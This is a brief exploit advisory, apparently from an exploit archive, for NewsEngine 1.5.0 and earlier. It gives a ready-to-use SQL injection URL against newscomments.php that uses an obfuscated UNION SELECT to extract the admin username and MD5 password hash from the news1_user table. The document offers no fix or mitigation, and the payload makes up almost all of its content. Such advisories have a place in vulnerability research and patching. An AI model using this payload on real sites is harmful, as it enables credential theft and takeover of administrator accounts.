NewsEngine 1.5.0 or prior suffers from a remote SQL injection vulnerability in newscomments.php.
0e2f1699f9db1562259804487687422defe2294c9603b089bbba37007c8f8600
# Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
# Author : ajann
### Vulnerability;
$$$ http://[target]/[path]/newscomments.php
Example:
$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news1_user/**/where/**/userid=1/*
Admin MD5 HaSh